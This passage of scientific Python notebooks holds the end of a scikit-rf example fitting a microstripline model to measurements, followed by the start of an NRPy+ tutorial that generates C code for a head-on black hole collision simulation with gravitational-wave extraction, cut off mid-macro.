f_high=1e12, f_epr_tand=f_epr_tand, diel='djordjevicsvensson', disp='kirschningjansen') DUT = m.line(L, 'm', embed=True, z0=m.Z0_f) DUT.name = 'DUT' Loss_mod = 20 * log10(absolute(DUT.s[:,1,0])) plt.figure() plt.suptitle('Measurement vs Model') plt.subplot(2,1,1) plt.plot(f * 1e-9, Er_eff, label='Measured') plt.plot(f * 1e-9, real(m.ep_reff_f), label='Model') plt.ylabel('$\epsilon_{r,eff}$') plt.legend() plt.subplot(2,1,2) plt.plot(f * 1e-9, Loss_mea, label='Measured') plt.plot(f * 1e-9, Loss_mod, label='Model') plt.xlabel('Frequency (GHz)') plt.ylabel('Insertion Loss (dB)') plt.legend() plt.show() # - # The model results shows a reasonnable agreement with the measured $\epsilon_{r,eff}$ and Insertion Loss values. # ## Checking the results # # If the model is now plotted against the measurement of the same length, the plot shows no agreement. This is because the connector effects are not captured by the model. plt.figure() plt.title('Measured vs modelled data') MSL100.plot_s_db() DUT.plot_s_db(0, 0, color='k') DUT.plot_s_db(1, 0, color='k') plt.show() # ### Connector delay and loss estimation # # The delay of the connector is estimated by fitting a line to its phase contribution vs frequency. # # The phase and loss of the two connector are computed by subtracting phase and loss computed without the connectors to the measurement of the same length. # + phi_conn = np.unwrap(np.angle(MSL100.s[:,1,0])) + deltaPhi z = np.polyfit(f, phi_conn, 1) p = np.poly1d(z) delay = -z[0]/(2*np.pi)/2 print('Connector delay: {:.0f} ps'.format(delay * 1e12)) loss_conn_db = 20 * log10(absolute(MSL100.s[:,1,0])) - Loss_mea alpha = 1.6*np.log(10)/20 * np.sqrt(f/1e9) beta = 2*np.pi*f/c0 gamma = alpha + 1j*beta mf = rf.media.DefinedGammaZ0(m.frequency, z0=50, gamma=gamma) left = mf.line(delay*1e9, 'ns', embed=True, z0=53.2) right = left.flipped() check = left ** right plt.figure() plt.suptitle('Connector effects') plt.subplot(2,1,1) plt.plot(f * 1e-9, phi_conn, label='measured') plt.plot(f * 1e-9, np.unwrap(np.angle(check.s[:,1,0])), label='model') plt.ylabel('phase (rad)') plt.legend() plt.subplot(2,1,2) plt.plot(f * 1e-9, loss_conn_db, label='Measured') plt.plot(f * 1e-9, 20*np.log10(np.absolute(check.s[:,1,0])), label='model') plt.xlabel('Frequency (GHz)') plt.ylabel('Insertion Loss (dB)') plt.legend() plt.show() # - # The phase of the model shows a good agreement, while the Insertion Loss seems to have a reasonnable agreement and is small whatsoever. # ### Connector impedance adjustement by time-domain reflectometry # # Time-domain step responses of measurement and model are used to adjust the connector model characteristic impedance. # # The plots shows the connector having an inductive behaviour (positive peak) and the microstripline being a bit too much capacitive (negative plateau). # # Characteristic impedance of the connector is tuned by trial-and-error until a reasonnable agreement is achieved. Optimization could have been used instead. # # # + mod = left ** DUT ** right MSL100_dc = MSL100.extrapolate_to_dc(kind='linear') DUT_dc = mod.extrapolate_to_dc(kind='linear') plt.figure() plt.suptitle('Left-right and right-left TDR') plt.subplot(2,1,1) MSL100_dc.s11.plot_s_time_step(pad=2000, window='hamming', label='Measured L-R') DUT_dc.s11.plot_s_time_step(pad=2000, window='hamming', label='Model L-R') plt.xlim(-2, 4) plt.subplot(2,1,2) MSL100_dc.s22.plot_s_time_step(pad=2000, window='hamming', label='Measured R-L') DUT_dc.s22.plot_s_time_step(pad=2000, window='hamming', label='Model R-L') plt.xlim(-2, 4) plt.tight_layout() plt.show() # - # ### Final comparison # + plt.figure() plt.title('Measured vs modelled data') MSL100.plot_s_db() mod.name = 'Model' mod.plot_s_db(0, 0, color='k') mod.plot_s_db(1, 0, color='k') plt.show() # - # The plot shows a decent agreement between the model and the measured data. The model is a good representation of the DUT between 1MHz and 5 GHz. # # At higher frequency, the model begin to deviate from the measurement. The model does not capture effects such as radiation loss or complex copper roughness. Smaller geometries such as the top ground plane chunk may also begin to contribute as they become electrically long with the increase of frequency. # # As a comparison, the 5GHz wavelenght is 60mm in the air and the MSL100 line is 100mm long. The DUT itself is electrically long above some GHz. #
doc/source/examples/networktheory/Correlating microstripline model to measurement.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # <script async src="https://www.googletagmanager.com/gtag/js?id=UA-59152712-8"></script> # <script> # window.dataLayer = window.dataLayer || []; # function gtag(){dataLayer.push(arguments);} # gtag('js', new Date()); # # gtag('config', 'UA-59152712-8'); # </script> # # # Start-to-Finish Example: Head-On Black Hole Collision with Gravitational Wave Analysis # # ## Author: <NAME> # ### Formatting improvements courtesy <NAME> # # ## This module implements a basic numerical relativity code to merge two black holes in *spherical coordinates*, as well as the gravitational wave analysis provided by the $\psi_4$ NRPy+ tutorial notebooks ([$\psi_4$](Tutorial-Psi4.ipynb) & [$\psi_4$ tetrad](Tutorial-Psi4_tetrads.ipynb)). # # ### Here we place the black holes initially on the $z$-axis, so the entire simulation is axisymmetric about the $\phi$-axis. Not sampling in the $\phi$ direction greatly speeds up the simulation. # # **Module Status:** <font color='green'><b> Validated </b></font> # # **Validation Notes:** This module has been validated to exhibit convergence to zero of the Hamiltonian constraint violation at the expected order to the exact solution *after a short numerical evolution of the initial data* (see [plot](#convergence) at bottom), and results have been validated to agree to roundoff error with the [original SENR code](https://bitbucket.org/zach_etienne/nrpy). # # Further, agreement of $\psi_4$ with result expected from black hole perturbation theory (*a la* Fig 6 of [Ruchlin, Etienne, and Baumgarte](https://arxiv.org/pdf/1712.07658.pdf)) has been successfully demonstrated in [Step 7](#compare). # # ### NRPy+ Source Code for this module: # 1. [BSSN/BrillLindquist.py](../edit/BSSN/BrillLindquist.py); [\[**tutorial**\]](Tutorial-ADM_Initial_Data-Brill-Lindquist.ipynb): Brill-Lindquist initial data; sets all ADM variables in Cartesian basis: # 1. [BSSN/ADM_Exact_Spherical_or_Cartesian_to_BSSNCurvilinear.py](../edit/BSSN/ADM_Exact_Spherical_or_Cartesian_to_BSSNCurvilinear.py); [\[**tutorial**\]](Tutorial-ADM_Initial_Data-Converting_Exact_ADM_Spherical_or_Cartesian_to_BSSNCurvilinear.ipynb): Spherical/Cartesian ADM$\to$Curvilinear BSSN converter function, for which exact expressions are given for ADM quantities. # 1. [BSSN/BSSN_ID_function_string.py](../edit/BSSN/BSSN_ID_function_string.py): Sets up the C code string enabling initial data be set up in a point-by-point fashion # 1. [BSSN/BSSN_constraints.py](../edit/BSSN/BSSN_constraints.py); [\[**tutorial**\]](Tutorial-BSSN_constraints.ipynb): Hamiltonian constraint in BSSN curvilinear basis/coordinates # 1. [BSSN/BSSN_RHSs.py](../edit/BSSN/BSSN_RHSs.py); [\[**tutorial**\]](Tutorial-BSSN_time_evolution-BSSN_RHSs.ipynb): Generates the right-hand sides for the BSSN evolution equations in singular, curvilinear coordinates # 1. [BSSN/BSSN_gauge_RHSs.py](../edit/BSSN/BSSN_gauge_RHSs.py); [\[**tutorial**\]](Tutorial-BSSN_time_evolution-BSSN_gauge_RHSs.ipynb): Generates the right-hand sides for the BSSN gauge evolution equations in singular, curvilinear coordinates # # # ## Introduction: # Here we use NRPy+ to generate the C source code necessary to set up initial data for two black holes (Brill-Lindquist, [Brill & Lindquist, Phys. Rev. 131, 471, 1963](https://journals.aps.org/pr/abstract/10.1103/PhysRev.131.471); see also Eq. 1 of [Brandt & Brügmann, arXiv:gr-qc/9711015v1](https://arxiv.org/pdf/gr-qc/9711015v1.pdf)). Then we use it to generate the RHS expressions for [Method of Lines](https://reference.wolfram.com/language/tutorial/NDSolveMethodOfLines.html) time integration based on the [explicit Runge-Kutta fourth-order scheme](https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods) (RK4). # # The entire algorithm is outlined below, with NRPy+-based components highlighted in <font color='green'>green</font>. # # 1. Allocate memory for gridfunctions, including temporary storage for the RK4 time integration. # 1. ([Step 2 below](#adm_id)) <font color='green'>Set gridfunction values to initial data (**[documented in previous start-to-finish module](Tutorial-Start_to_Finish-BSSNCurvilinear-Setting_up_two_BH_initial_data.ipynb)**).</font> # 1. Evolve the initial data forward in time using RK4 time integration. At each RK4 substep, do the following: # 1. ([Step 3 below](#bssn_rhs)) <font color='green'>Evaluate BSSN RHS expressions.</font> # 1. ([Step 4 below](#apply_bcs)) Apply singular, curvilinear coordinate boundary conditions [*a la* the SENR/NRPy+ paper](https://arxiv.org/abs/1712.07658) # 1. ([Step 5 below](#enforce3metric)) <font color='green'>Enforce conformal 3-metric $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint</font> # 1. At the end of each iteration in time, output the <font color='green'>Hamiltonian constraint violation</font>. # 1. Repeat above steps at two numerical resolutions to confirm convergence to zero. # <a id='toc'></a> # # # Table of Contents # $$\label{toc}$$ # # This notebook is organized as follows # # 1. [Step 1](#initializenrpy): Set core NRPy+ parameters for numerical grids and reference metric # 1. [Step 2](#adm_id): Import Brill-Lindquist ADM initial data C function from the [BSSN.BrillLindquist](../edit/BSSN/BrillLindquist.py) NRPy+ module # 1. [Step 3](#nrpyccodes) Define Functions for Generating C Codes of Needed Quantities # 1. [Step 3.a](#bssnrhs): BSSN RHSs # 1. [Step 3.b](#hamconstraint): Hamiltonian constraint # 1. [Step 3.c](#spinweight): Computing $_{-2}Y_{\ell m} (\theta, \phi)$ for all $(\ell,m)$ for $\ell=0$ up to 2 # 1. [Step 3.d](#psi4): $\psi_4$ # 1. [Step 4](#ccodegen): Generate C codes in parallel # 1. [Step 5](#apply_bcs): Apply singular, curvilinear coordinate boundary conditions # 1. [Step 6](#enforce3metric): Enforce conformal 3-metric $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint # 1. [Step 7](#mainc): `BrillLindquist_Playground.c`: The Main C Code # 1. [Step 8](#compare): Comparison with black hole perturbation theory # 1. [Step 9](#visual): Data Visualization Animations # 1. [Step 9.a](#installdownload): Install `scipy` and download `ffmpeg` if they are not yet installed/downloaded # 1. [Step 9.b](#genimages): Generate images for visualization animation # 1. [Step 9.c](#genvideo): Generate visualization animation # 1. [Step 10](#convergence): Visualize the numerical error, and confirm that it converges to zero with increasing numerical resolution (sampling) # 1. [Step 11](#latex_pdf_output): Output this notebook to $\LaTeX$-formatted PDF file # <a id='initializenrpy'></a> # # # Step 1: Set core NRPy+ parameters for numerical grids and reference metric \[Back to [top](#toc)\] # $$\label{initializenrpy}$$ # + # First we import needed core NRPy+ modules from outputC import * import NRPy_param_funcs as par import grid as gri import loop as lp import indexedexp as ixp import finite_difference as fin import reference_metric as rfm #par.set_parval_from_str("outputC::PRECISION","long double") # Set spatial dimension (must be 3 for BSSN) DIM = 3 par.set_parval_from_str("grid::DIM",DIM) # Set some core parameter choices, including order of MoL timestepping, FD order, # floating point precision, and CFL factor: # Choices are: Euler, "RK2 Heun", "RK2 MP", "RK2 Ralston", RK3, "RK3 Heun", "RK3 Ralston", # SSPRK3, RK4, DP5, DP5alt, CK5, DP6, L6, DP8 RK_method = "RK4" FD_order = 10 # Even numbers only, starting with 2. 12 is generally unstable REAL = "double" # Best to use double here. CFL_FACTOR= 0.5 # (GETS OVERWRITTEN WHEN EXECUTED.) In pure axisymmetry (symmetry_axes = 2 below) 1.0 works fine. Otherwise 0.5 or lower. # Generate timestepping code. As described above the Table of Contents, this is a 3-step process: # 3.A: Evaluate RHSs (RHS_string) # 3.B: Apply boundary conditions (post_RHS_string, pt 1) # 3.C: Enforce det(gammabar) = det(gammahat) constraint (post_RHS_string, pt 2) import MoLtimestepping.C_Code_Generation as MoL from MoLtimestepping.RK_Butcher_Table_Dictionary import Butcher_dict RK_order = Butcher_dict[RK_method][1] MoL.MoL_C_Code_Generation(RK_method, RHS_string = "rhs_eval(Nxx,Nxx_plus_2NGHOSTS,dxx, xx, RK_INPUT_GFS, RK_OUTPUT_GFS);", post_RHS_string = """ apply_bcs(Nxx, Nxx_plus_2NGHOSTS, bc_gz_map,bc_parity_conditions,NUM_EVOL_GFS,evol_gf_parity, RK_OUTPUT_GFS); enforce_detgammabar_constraint(Nxx_plus_2NGHOSTS, xx, RK_OUTPUT_GFS);\n""") # Set finite differencing order: par.set_parval_from_str("finite_difference::FD_CENTDERIVS_ORDER", FD_order) # REAL and CFL_FACTOR parameters used below in C code directly # Then we set the coordinate system for the numerical grid par.set_parval_from_str("reference_metric::CoordSystem","SinhSpherical") rfm.reference_metric() # Create ReU, ReDD needed for rescaling B-L initial data, generating BSSN RHSs, etc. # Set the finite-differencing order to 6, matching B-L test from REB paper (Pg 20 of https://arxiv.org/pdf/1712.07658.pdf) par.set_parval_from_str("finite_difference::FD_CENTDERIVS_ORDER",FD_order) # Then we set the phi axis to be the symmetry axis; i.e., axis "2", corresponding to the i2 direction. # This sets all spatial derivatives in the phi direction to zero. par.set_parval_from_str("indexedexp::symmetry_axes","2") ################# # Next output C headers related to the numerical grids we just set up: ################# # First output the coordinate bounds xxmin[] and xxmax[]: with open("BSSN/xxminmax.h", "w") as file: file.write("const REAL xxmin[3] = {"+str(rfm.xxmin[0])+","+str(rfm.xxmin[1])+","+str(rfm.xxmin[2])+"};\n") file.write("const REAL xxmax[3] = {"+str(rfm.xxmax[0])+","+str(rfm.xxmax[1])+","+str(rfm.xxmax[2])+"};\n") # Next output the proper distance between gridpoints in given coordinate system. # This is used to find the minimum timestep. dxx = ixp.declarerank1("dxx",DIM=3) ds_dirn = rfm.ds_dirn(dxx) outputC([ds_dirn[0],ds_dirn[1],ds_dirn[2]],["ds_dirn0","ds_dirn1","ds_dirn2"],"BSSN/ds_dirn.h") # Generic coordinate NRPy+ file output, Part 2: output the conversion from (x0,x1,x2) to Cartesian (x,y,z) outputC([rfm.xxCart[0],rfm.xxCart[1],rfm.xxCart[2]],["xCart[0]","xCart[1]","xCart[2]"], "BSSN/xxCart.h") # - # <a id='adm_id'></a> # # # Step 2: Import Brill-Lindquist ADM initial data C function from the [BSSN.BrillLindquist](../edit/BSSN/BrillLindquist.py) NRPy+ module \[Back to [top](#toc)\] # $$\label{adm_id}$$ # # The [BSSN.BrillLindquist](../edit/BSSN/BrillLindquist.py) NRPy+ module does the following: # # 1. Set up Brill-Lindquist initial data [ADM](https://en.wikipedia.org/wiki/ADM_formalism) quantities in the **Cartesian basis**, as [documented here](Tutorial-ADM_Initial_Data-Brill-Lindquist.ipynb). # 1. Convert the ADM **Cartesian quantities** to **BSSN quantities in the desired Curvilinear basis** (set by reference_metric::CoordSystem), as [documented here](Tutorial-ADM_Initial_Data-Converting_ADMCartesian_to_BSSNCurvilinear.ipynb). # 1. Sets up the standardized C function for setting all BSSN Curvilinear gridfunctions in a pointwise fashion, as [written here](../edit/BSSN/BSSN_ID_function_string.py), and returns the C function as a Python string. import BSSN.BrillLindquist as bl def BrillLindquistID(): returnfunction = bl.BrillLindquist() # Now output the Brill-Lindquist initial data to file: with open("BSSN/BrillLindquist.h","w") as file: file.write(bl.returnfunction) # <a id='nrpyccodes'></a> # # # Step 3: Define Functions for Generating C Codes of Needed Quantities \[Back to [top](#toc)\] # $$\label{nrpyccodes}$$ # # <a id='bssnrhs'></a> # # ## Step 3.a: BSSN RHSs \[Back to [top](#toc)\] # $$\label{bssnrhs}$$ # + import BSSN.BSSN_RHSs as rhs import BSSN.BSSN_gauge_RHSs as gaugerhs import time # Set the *covariant*, second-order Gamma-driving shift condition par.set_parval_from_str("BSSN.BSSN_gauge_RHSs::ShiftEvolutionOption", "GammaDriving2ndOrder_Covariant") rhs.BSSN_RHSs() gaugerhs.BSSN_gauge_RHSs() thismodule = __name__ diss_strength = par.Cparameters("REAL", thismodule, "diss_strength", 1e300) # diss_strength must be set in C, and # we set it crazy high to ensure this. alpha_dKOD = ixp.declarerank1("alpha_dKOD") cf_dKOD = ixp.declarerank1("cf_dKOD") trK_dKOD = ixp.declarerank1("trK_dKOD") betU_dKOD = ixp.declarerank2("betU_dKOD","nosym") vetU_dKOD = ixp.declarerank2("vetU_dKOD","nosym") lambdaU_dKOD = ixp.declarerank2("lambdaU_dKOD","nosym") aDD_dKOD = ixp.declarerank3("aDD_dKOD","sym01") hDD_dKOD = ixp.declarerank3("hDD_dKOD","sym01") for k in range(DIM): gaugerhs.alpha_rhs += diss_strength*alpha_dKOD[k] rhs.cf_rhs += diss_strength* cf_dKOD[k] rhs.trK_rhs += diss_strength* trK_dKOD[k] for i in range(DIM): gaugerhs.bet_rhsU[i] += diss_strength* betU_dKOD[i][k] gaugerhs.vet_rhsU[i] += diss_strength* vetU_dKOD[i][k] rhs.lambda_rhsU[i] += diss_strength*lambdaU_dKOD[i][k] for j in range(DIM): rhs.a_rhsDD[i][j] += diss_strength*aDD_dKOD[i][j][k] rhs.h_rhsDD[i][j] += diss_strength*hDD_dKOD[i][j][k] def BSSN_RHSs(): print("Generating C code for BSSN RHSs in "+par.parval_from_str("reference_metric::CoordSystem")+" coordinates.") start = time.time() BSSN_evol_rhss = [ \ lhrh(lhs=gri.gfaccess("rhs_gfs","aDD00"),rhs=rhs.a_rhsDD[0][0]), lhrh(lhs=gri.gfaccess("rhs_gfs","aDD01"),rhs=rhs.a_rhsDD[0][1]), lhrh(lhs=gri.gfaccess("rhs_gfs","aDD02"),rhs=rhs.a_rhsDD[0][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","aDD11"),rhs=rhs.a_rhsDD[1][1]), lhrh(lhs=gri.gfaccess("rhs_gfs","aDD12"),rhs=rhs.a_rhsDD[1][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","aDD22"),rhs=rhs.a_rhsDD[2][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","alpha"),rhs=gaugerhs.alpha_rhs), lhrh(lhs=gri.gfaccess("rhs_gfs","betU0"),rhs=gaugerhs.bet_rhsU[0]), lhrh(lhs=gri.gfaccess("rhs_gfs","betU1"),rhs=gaugerhs.bet_rhsU[1]), lhrh(lhs=gri.gfaccess("rhs_gfs","betU2"),rhs=gaugerhs.bet_rhsU[2]), lhrh(lhs=gri.gfaccess("rhs_gfs","cf"), rhs=rhs.cf_rhs), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD00"),rhs=rhs.h_rhsDD[0][0]), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD01"),rhs=rhs.h_rhsDD[0][1]), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD02"),rhs=rhs.h_rhsDD[0][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD11"),rhs=rhs.h_rhsDD[1][1]), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD12"),rhs=rhs.h_rhsDD[1][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD22"),rhs=rhs.h_rhsDD[2][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","lambdaU0"),rhs=rhs.lambda_rhsU[0]), lhrh(lhs=gri.gfaccess("rhs_gfs","lambdaU1"),rhs=rhs.lambda_rhsU[1]), lhrh(lhs=gri.gfaccess("rhs_gfs","lambdaU2"),rhs=rhs.lambda_rhsU[2]), lhrh(lhs=gri.gfaccess("rhs_gfs","trK"), rhs=rhs.trK_rhs), lhrh(lhs=gri.gfaccess("rhs_gfs","vetU0"),rhs=gaugerhs.vet_rhsU[0]), lhrh(lhs=gri.gfaccess("rhs_gfs","vetU1"),rhs=gaugerhs.vet_rhsU[1]), lhrh(lhs=gri.gfaccess("rhs_gfs","vetU2"),rhs=gaugerhs.vet_rhsU[2]) ] import BSSN.BSSN_quantities as Bq Bq.BSSN_basic_tensors() betaU = Bq.betaU BSSN_RHSs_string = fin.FD_outputC("returnstring",BSSN_evol_rhss, params="outCverbose=False",upwindcontrolvec=betaU) end = time.time() print("Finished generating BSSN RHSs in "+str(end-start)+" seconds.") with open("BSSN/BSSN_RHSs.h", "w") as file: file.write(lp.loop(["i2","i1","i0"],["NGHOSTS","NGHOSTS","NGHOSTS"], ["NGHOSTS+Nxx[2]","NGHOSTS+Nxx[1]","NGHOSTS+Nxx[0]"], ["1","1","1"],["const REAL invdx0 = 1.0/dxx[0];\n"+ "const REAL invdx1 = 1.0/dxx[1];\n"+ "const REAL invdx2 = 1.0/dxx[2];\n"+ "#pragma omp parallel for", " const REAL xx2 = xx[2][i2];", " const REAL xx1 = xx[1][i1];"],"", """ const REAL xx0 = xx[0][i0]; #define ERF(X, X0, W) (0.5 * (erf( ( (X) - (X0) ) / (W) ) + 1.0)) REAL xCart[3]; #include "../CurviBoundaryConditions/xxCart.h" const REAL diss_strength = ERF(sqrt(xCart[0]*xCart[0] + xCart[1]*xCart[1] + xCart[2]*xCart[2]),2.0L,0.17L)*0.99L;\n"""+BSSN_RHSs_string)) # - # <a id='hamconstraint'></a> # # ## Step 3.b: Output C code for Hamiltonian constraint \[Back to [top](#toc)\] # $$\label{hamconstraint}$$ # # Next output the C code for evaluating the Hamiltonian constraint. In the absence of numerical error, this constraint should evaluate to zero. However it does not due to numerical (typically truncation and roundoff) error. We will therefore measure the Hamiltonian constraint violation to gauge the accuracy of our simulation, and, ultimately determine whether errors are dominated by numerical finite differencing (truncation) error as expected. # First register the Hamiltonian as a gridfunction. H = gri.register_gridfunctions("AUX","H") # Then define the Hamiltonian constraint and output the optimized C code. import BSSN.BSSN_constraints as bssncon def H(): print("Generating C code for BSSN Hamiltonian in "+par.parval_from_str("reference_metric::CoordSystem")+" coordinates.") bssncon.output_C__Hamiltonian_h(add_T4UUmunu_source_terms=False) # <a id='spinweight'></a> # # ## Step 3.c: Computing $_{-2}Y_{\ell m} (\theta, \phi)$ for all $(\ell,m)$ for $\ell=0$ up to 2 \[Back to [top](#toc)\] # $$\label{spinweight}$$ # # [**Tutorial Module**](Tutorial-SpinWeighted_Spherical_Harmonics.ipynb) import SpinWeight_minus2_SphHarmonics.SpinWeight_minus2_SphHarmonics as swm2 swm2.SpinWeight_minus2_SphHarmonics(maximum_l=2,filename="SpinWeight_minus2_SphHarmonics/SpinWeight_minus2_SphHarmonics.h") # <a id='psi4'></a> # # ## Step 3.d: Output $\psi_4$ \[Back to [top](#toc)\] # $$\label{psi4}$$ # # We output $\psi_4$, assuming Quasi-Kinnersley tetrad of [Baker, Campanelli, Lousto (2001)](https://arxiv.org/pdf/gr-qc/0104063.pdf). # + import BSSN.Psi4_tetrads as BP4t par.set_parval_from_str("BSSN.Psi4_tetrads::TetradChoice","QuasiKinnersley") #par.set_parval_from_str("BSSN.Psi4_tetrads::UseCorrectUnitNormal","True") import BSSN.Psi4 as BP4 BP4.Psi4() psi4r_0pt = gri.register_gridfunctions("AUX","psi4r_0pt") psi4r_1pt = gri.register_gridfunctions("AUX","psi4r_1pt") psi4r_2pt = gri.register_gridfunctions("AUX","psi4r_2pt") psi4i_0pt = gri.register_gridfunctions("AUX","psi4i_0pt") psi4i_1pt = gri.register_gridfunctions("AUX","psi4i_1pt") psi4i_2pt = gri.register_gridfunctions("AUX","psi4i_2pt") def Psi4re(part): print("Generating C code for psi4_re_pt"+str(part)+" in "+par.parval_from_str("reference_metric::CoordSystem")+" coordinates.") start = time.time() fin.FD_outputC("BSSN/Psi4re_pt"+str(part)+"_lowlevel.h", [lhrh(lhs=gri.gfaccess("aux_gfs","psi4r_"+str(part)+"pt"),rhs=BP4.psi4_re_pt[part])], params="outCverbose=False") end = time.time() print("Finished generating psi4_re_pt"+str(part)+" in "+str(end-start)+" seconds.") def Psi4im(part): print("Generating C code for psi4_im_pt"+str(part)+" in "+par.parval_from_str("reference_metric::CoordSystem")+" coordinates.") start = time.time() fin.FD_outputC("BSSN/Psi4im_pt"+str(part)+"_lowlevel.h", [lhrh(lhs=gri.gfaccess("aux_gfs","psi4i_"+str(part)+"pt"),rhs=BP4.psi4_im_pt[part])], params="outCverbose=False") end = time.time() print("Finished generating psi4_im_pt"+str(part)+" in "+str(end-start)+" seconds.") # - # <a id='ccodegen'></a> # # # Step 4: Perform Parallelized C Code Generation \[Back to [top](#toc)\] # $$\label{ccodegen}$$ # # Here we call all functions defined in [the above section](#nrpyccodes) in parallel, to greatly expedite C code generation on multicore CPUs. # + import multiprocessing if __name__ == '__main__': ID = multiprocessing.Process(target=BrillLindquistID) RHS = multiprocessing.Process(target=BSSN_RHSs) H = multiprocessing.Process(target=H) Psi4re0 = multiprocessing.Process(target=Psi4re, args=(0,)) Psi4re1 = multiprocessing.Process(target=Psi4re, args=(1,)) Psi4re2 = multiprocessing.Process(target=Psi4re, args=(2,)) Psi4im0 = multiprocessing.Process(target=Psi4im, args=(0,)) Psi4im1 = multiprocessing.Process(target=Psi4im, args=(1,)) Psi4im2 = multiprocessing.Process(target=Psi4im, args=(2,)) ID.start() RHS.start() H.start() Psi4re0.start() Psi4re1.start() Psi4re2.start() Psi4im0.start() Psi4im1.start() Psi4im2.start() ID.join() RHS.join() H.join() Psi4re0.join() Psi4re1.join() Psi4re2.join() Psi4im0.join() Psi4im1.join() Psi4im2.join() # - # <a id='apply_bcs'></a> # # # Step 5: Apply singular, curvilinear coordinate boundary conditions \[Back to [top](#toc)\] # $$\label{apply_bcs}$$ # # Next apply singular, curvilinear coordinate boundary conditions [as documented in the corresponding NRPy+ tutorial notebook](Tutorial-Start_to_Finish-Curvilinear_BCs.ipynb) import CurviBoundaryConditions.CurviBoundaryConditions as cbcs cbcs.Set_up_CurviBoundaryConditions() # <a id='enforce3metric'></a> # # # Step 6: Enforce conformal 3-metric $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint \[Back to [top](#toc)\] # $$\label{enforce3metric}$$ # # Then enforce conformal 3-metric $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint (Eq. 53 of [<NAME>, and Baumgarte (2018)](https://arxiv.org/abs/1712.07658)), as [documented in the corresponding NRPy+ tutorial notebook](Tutorial-BSSN-Enforcing_Determinant_gammabar_equals_gammahat_Constraint.ipynb). # # Applying curvilinear boundary conditions should affect the initial data at the outer boundary, and will in general cause the $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint to be violated there. Thus after we apply these boundary conditions, we must always call the routine for enforcing the $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint: import BSSN.Enforce_Detgammabar_Constraint as EGC EGC.output_Enforce_Detgammabar_Constraint_Ccode() # <a id='mainc'></a> # # # Step 7: `BrillLindquist_Playground.c`: The Main C Code \[Back to [top](#toc)\] # $$\label{mainc}$$ # + # Part P0: Define REAL, set the number of ghost cells NGHOSTS (from NRPy+'s FD_CENTDERIVS_ORDER), # and set the CFL_FACTOR (which can be overwritten at the command line) with open("BSSN/BSSN_Playground_REAL__NGHOSTS__CFL_FACTOR.h", "w") as file: file.write(""" // Part P0.a: Set the number of ghost cells, from NRPy+'s FD_CENTDERIVS_ORDER #define NGHOSTS """+str(int(FD_order/2)+1)+""" // Part P0.b: Set the numerical precision (REAL) to double, ensuring all floating point // numbers are stored to at least ~16 significant digits #define REAL """+REAL+""" // Part P0.c: Set the number of ghost cells, from NRPy+'s FD_CENTDERIVS_ORDER REAL CFL_FACTOR = """+str(CFL_FACTOR)+"""; // Set the CFL Factor. Can be overwritten at command line.""") # + # %%writefile BSSN/BrillLindquist_Playground.c // Step P0: define NGHOSTS and declare CFL_FACTOR. #include "BSSN_Playground_REAL__NGHOSTS__CFL_FACTOR.h" // Step P1: Import needed header files #include "stdio.h" #include "stdlib.h" #include "math.h" #include "time.h" #include "stdint.h" // Needed for Windows GCC 6.x compatibility #ifndef M_PI #define M_PI 3.141592653589793238462643383279502884L #endif #ifndef M_SQRT1_2 #define M_SQRT1_2 0.707106781186547524400844362104849039L #endif // Step P2: Set free parameters // Step P2a: Free parameters for the numerical grid // ONLY SinhSpherical used in this module. // SinhSpherical coordinates parameters const REAL AMPL = 300; // Parameter has been updated, compared to B-L test from REB paper (Pg 20 of https://arxiv.org/pdf/1712.07658.pdf) const REAL SINHW = 0.2L; // Parameter has been updated, compared to B-L test from REB paper (Pg 20 of https://arxiv.org/pdf/1712.07658.pdf) //const REAL SINHW = 0.125; // Matches B-L test from REB paper (Pg 20 of https://arxiv.org/pdf/1712.07658.pdf) // Time coordinate parameters const REAL t_final = 275; /* Final time is set so that at t=t_final, * data at the plotted wave extraction radius have not been corrupted * by the approximate outer boundary condition */ // Step P2b: Free parameters for the spacetime evolution const REAL eta = 2.0; // Gamma-driving shift condition parameter. Matches B-L test from REB paper (Pg 20 of https://arxiv.org/pdf/1712.07658.pdf) // Step P3: Implement the algorithm for upwinding. // *NOTE*: This upwinding is backwards from // usual upwinding algorithms, because the // upwinding control vector in BSSN (the shift) // acts like a *negative* velocity. #define UPWIND_ALG(UpwindVecU) UpwindVecU > 0.0 ? 1.0 : 0.0 // Step P4: Set free parameters for the (Brill-Lindquist) initial data const REAL BH1_posn_x = 0.0,BH1_posn_y = 0.0,BH1_posn_z = +0.25; const REAL BH2_posn_x = 0.0,BH2_posn_y = 0.0,BH2_posn_z = -0.25; //const REAL BH1_posn_x = 0.0,BH1_posn_y = 0.0,BH1_posn_z = +0.05; // SUPER CLOSE //const REAL BH2_posn_x = 0.0,BH2_posn_y = 0.0,BH2_posn_z = -0.05; // SUPER CLOSE const REAL BH1_mass = 0.5,BH2_mass = 0.5; // Step P5: Declare the IDX4(gf,i,j,k) macro, which enables us to store 4-dimensions of // data in a 1D array. In this case, consecutive values of "i" // (all other indices held to a fixed value) are consecutive in memory, where // consecutive values of "j" (fixing all other indices) are separated by // Nxx_plus_2NGHOSTS[0] elements in memory. Similarly, consecutive values of // "k" are separated by Nxx_plus_2NGHOSTS[0]*Nxx_plus_2NGHOSTS[1] in memory, etc. #define IDX4(g,i,j,k) \ ( (i) + Nxx_plus_2NGHOSTS[0] * ( (j) + Nxx_plus_2NGHOSTS[1] * ( (k) + 